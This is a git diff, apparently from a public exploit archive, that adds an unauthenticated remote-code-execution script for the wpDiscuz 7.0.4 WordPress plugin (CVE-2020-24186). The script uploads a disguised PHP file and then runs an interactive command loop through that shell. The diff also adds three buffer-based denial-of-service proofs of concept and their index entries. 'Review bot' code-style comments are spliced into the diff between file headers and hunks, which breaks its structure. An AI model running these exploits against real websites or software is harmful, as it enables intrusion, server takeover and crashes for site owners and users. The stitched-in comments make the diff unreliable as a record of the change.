diff --git a/exploits/php/webapps/49967.py b/exploits/php/webapps/49967.py
new file mode 100755
index 000000000..ccf74e595
--- /dev/null
+++ b/exploits/php/webapps/49967.py
@@ -0,0 +1,126 @@
+# Exploit Title: WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)
+# Date: 2021/06/08
+# Exploit Author: Fellipe Oliveira
+# Vendor Homepage: https://gvectors.com/
+# Software Link: https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip
+# Version: wpDiscuz 7.0.4
+# Tested on: Debian9, Windows 7, Windows 10 (Wordpress 5.7.2)
+# CVE : CVE-2020-24186
+# Thanks for the great contribution to the code: Z3roC00l (https://twitter.com/zeroc00I)
+
+#!/bin/python3
+
+import requests
+import optparse
+import re
+import random
+import time
+import string
+import json
+
+parser = optparse.OptionParser()
+parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://192.168.1.81/blog")
+parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /2021/06/blogpost")
+
+
+options, args = parser.parse_args()
+
+if not options.url or not options.path:
+ print('[+] Specify an url target')
+ print('[+] Example usage: exploit.py -u http://192.168.1.81/blog -p /wordpress/2021/06/blogpost')
+ print('[+] Example help usage: exploit.py -h')
+ exit()
+
+session = requests.Session()
+
+main_url = options.url
+path = options.path
+url_blog = main_url + path
+clean_host = main_url.replace('http://', '').replace('/wordpress','')
+
+def banner():
+ print('---------------------------------------------------------------')
+ print('[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution')
+ print('[-] File Upload Bypass Vulnerability - PHP Webshell Upload')
+ print('[-] CVE: CVE-2020-24186')
+ print('[-] https://github.com/hevox')
+ print('--------------------------------------------------------------- \n')
+
+def csrfRequest():
+ global wmuSec
+ global wc_post_id
+
+ try:
+ get_html = session.get(url_blog)
+ response_len = str(len(get_html.text))
+ response_code = str(get_html.status_code)
+ print('[+] Response length:['+response_len+'] | code:['+response_code+']')
+
+ raw_wmu = 
get_html.text.replace(',','\n')
+ wmuSec = re.findall('wmuSecurity.*$',raw_wmu,re.MULTILINE)[0].split('"')[2]
+ print('[!] Got wmuSecurity value: '+ wmuSec +'')
+ raw_postID = get_html.text.replace(',','\n')
+ wc_post_id = re.findall('wc_post_id.*$',raw_postID,re.MULTILINE)[0].split('"')[2]
+ print('[!] Got wmuSecurity value: '+ wc_post_id +' \n')
+
+ except requests.exceptions.ConnectionError as err:
+ print('\n[x] Failed to Connect in: '+url_blog+' ')
+ print('[x] This host seems to be Down')
+ exit()
+
+
+def nameRandom():
+ global shell_name
+ print('[+] Generating random name for Webshell...')
+ shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15)))
+ time.sleep(1)
+ print('[!] Generated webshell name: '+shell_name+'\n')
+
+ return shell_name
+
+
+def shell_upload():
+ global shell
+ print('[!] Trying to Upload Webshell..')
+ try:
+ upload_url = main_url + "/wp-admin/admin-ajax.php"
+ upload_cookies = {"wordpress_test_cookie": "WP%20Cookie%20check", "wpdiscuz_hide_bubble_hint": "1"}
+ upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------2032192841253859011643762941", "Origin": "http://"+clean_host+"", "Connection": "close", "Referer": url_blog}
+ upload_data = "-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nwmuUploadFiles\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmu_nonce\"\r\n\r\n"+wmuSec+"\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\r\n\r\n\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmu_files[0]\"; 
filename=\""+shell_name+".php\"\r\nContent-Type: image/png\r\n\r\nGIF689a;\r\n\r\n\r\n\x1a\x82\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"postId\"\r\n\r\n"+wc_post_id+"\r\n-----------------------------2032192841253859011643762941--\r\n"
+ check = session.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data)
+ json_object = (json.loads(check.text))
+ status = (json_object["success"])
+
+ get_path = (check.text.replace(',','\n'))
+ shell_pret = re.findall('url.*$',get_path,re.MULTILINE)
+ find_shell = str(shell_pret)
+ raw = (find_shell.replace('\\','').replace('url":"','').replace('\',','').replace('"','').replace('[\'',''))
+ shell = (raw.split(" ",1)[0])
+
+ if status == True:
+ print('[+] Upload Success... Webshell path:' +shell+' \n')
+ else:
+ print('[x] Failed to Upload Webshell in: '+ url_blog +' ')
+ exit()
+
+ except requests.exceptions.HTTPError as conn:
+ print('[x] Failed to Upload Webshell in: '+ url_blog +' ')
+
+ return shell
+
+
+def code_exec():
+ try:
+ while True:
+ cmd = input('> ')
+ codex = session.get(shell + '?cmd='+cmd+'')
+ print(codex.text.replace('GIF689a;','').replace('�',''))
+ except:
+ print('\n[x] Failed to execute PHP code...')
+
+
+banner()
+csrfRequest()
+nameRandom()
+shell_upload()
+code_exec()
\ No newline at end of file
diff --git a/exploits/windows/dos/49964.py b/exploits/windows/dos/49964.py
new file mode 100755
index 000000000..bf5d035b0
--- /dev/null
+++ b/exploits/windows/dos/49964.py
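Review bot: The second status line in csrfRequest is mislabeled: it prints `wc_post_id` under the caption `Got wmuSecurity value`, so the run log shows two "wmuSecurity" lines and never names the post id; change it to `print('[!] Got wc_post_id value: '+ wc_post_id +' \n')`. The `#!/bin/python3` shebang is placed after the comment header, where it is just a comment; it only takes effect as the first line of the file. In code_exec the bare `except:` also catches KeyboardInterrupt, so Ctrl-C is reported as "Failed to execute PHP code..." instead of ending the loop; narrowing it to the `requests.exceptions` classes the other functions already catch would make the message truthful. `if status == True:` reads more idiomatically as `if status:`, and the unused `err`/`conn` binding names in the except clauses can be dropped.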
@@ -0,0 +1,20 @@
+# Exploit Title: NBMonitor 1.6.8 - Denial of Service (PoC)
+# Date: 07/06/2021
+# Author: Erick Galindo
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
+# Version: 1.6.8
+# Tested on: Windows 10 Pro x64 es
+
+# Proof of Concept:
+#1.- Copy printed "AAAAA..." string to clipboard!
+#2.- Go to Register > Enter Registration Code...
+#3.- Write anything in 'Name' field
+#4.- Paste clipboard in 'Key' field
+#5.- Click on button -> Ok
+
+buffer = "\x41" * 256
+
+f = open ("NBM.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/49965.py b/exploits/windows/dos/49965.py
new file mode 100755
index 000000000..cedc725f3
--- /dev/null
+++ b/exploits/windows/dos/49965.py
@@ -0,0 +1,21 @@
+# Exploit Title: Nsauditor 3.2.3 - Denial of Service (PoC)
+# Date: 07/06/2021
+# Author: Erick Galindo
+# Vendor Homepage: http://www.nsauditor.com
+# Software http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Version: 3.2.3.0
+# Tested on: Windows 10 Pro x64 es
+
+# Proof of Concept:
+#1.- Copy printed "AAAAA..." string to clipboard!
+#2.- Open Nsauditor.exe
+#3.- Go to Register > Enter Registration Code...
+#4.- Write anything in 'Name' field
+#5.- Paste clipboard in 'Key' field
+#6.- Click on button -> Ok
+
+buffer = "\x41" * 256
+
+f = open ("NBM.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/49966.py b/exploits/windows/local/49966.py
new file mode 100755
index 000000000..35de5e1ce
--- /dev/null
+++ b/exploits/windows/local/49966.py
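Review bot: The PoC steps tell the reader to "Copy printed "AAAAA..." string to clipboard", but the script prints nothing — it writes the buffer to `NBM.txt` — so step 1 should read `#1.- Open the generated NBM.txt and copy its contents to clipboard!` (or the script should `print(buffer)`). The same mismatch is in 49965.py in this hunk and in 49966.py in the next one, which writes `poc.txt`. 49965.py is for Nsauditor yet still writes `NBM.txt`, which looks like a leftover from 49964.py; a distinct file name would avoid one PoC overwriting the other's output. The open/write/close triple would also be cleaner as `with open("NBM.txt", "w") as f:` / `    f.write(buffer)`, which closes the file even if the write raises.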
@@ -0,0 +1,21 @@
+# Exploit Title: Backup Key Recovery 2.2.7 - Denial of Service (PoC)
+# Date: 07/06/2021
+# Author: Erick Galindo
+# Vendor Homepage: http://www.nsauditor.com
+# Software http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
+# Version: 2.2.7.0
+# Tested on: Windows 10 Pro x64 es
+
+# Proof of Concept:
+#1.- Copy printed "AAAAA..." string to clipboard!
+#2.- Open BackupKeyRecovery.exe
+#3.- Go to Register > Enter Registration Code...
+#4.- Write anything in 'Name' field
+#5.- Paste clipboard in 'Key' field
+#6.- Click on button -> Ok
+
+buffer = "\x41" * 256
+
+f = open ("poc.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8757be0ce..a0e6960d4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6794,6 +6794,8 @@ id,file,description,date,author,type,platform,port
 49953,exploits/ios/dos/49953.py,"Macaron Notes great notebook 5.5 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
 49954,exploits/ios/dos/49954.py,"My Notes Safe 5.3 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
 49957,exploits/ios/dos/49957.py,"Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)",2021-06-07,"Geovanni Ruiz",dos,ios,
+49964,exploits/windows/dos/49964.py,"NBMonitor 1.6.8 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",dos,windows,
+49965,exploits/windows/dos/49965.py,"Nsauditor 3.2.3 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11352,6 +11354,7 @@ id,file,description,date,author,type,platform,port
 49925,exploits/windows/local/49925.txt,"Veyon 4.4.1 - 'VeyonService' Unquoted Service Path",2021-06-01,"Víctor García",local,windows,
 49929,exploits/windows/local/49929.txt,"Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path",2021-06-02,"Geovanni Ruiz",local,windows,
 49959,exploits/windows/local/49959.py,"IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP",2021-06-07,"Austin Babcock",local,windows,
+49966,exploits/windows/local/49966.py,"Backup Key Recovery 2.2.7 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44120,3 +44123,4 @@ id,file,description,date,author,type,platform,port
 49960,exploits/linux/webapps/49960.py,"Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated)",2021-06-07,enox,webapps,linux,
 49961,exploits/php/webapps/49961.py,"Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated)",2021-06-07,enox,webapps,php,
 49962,exploits/php/webapps/49962.sh,"Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)",2021-06-07,UnD3sc0n0c1d0,webapps,php,
+49967,exploits/php/webapps/49967.py,"WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)",2021-06-08,"Fellipe Oliveira",webapps,php,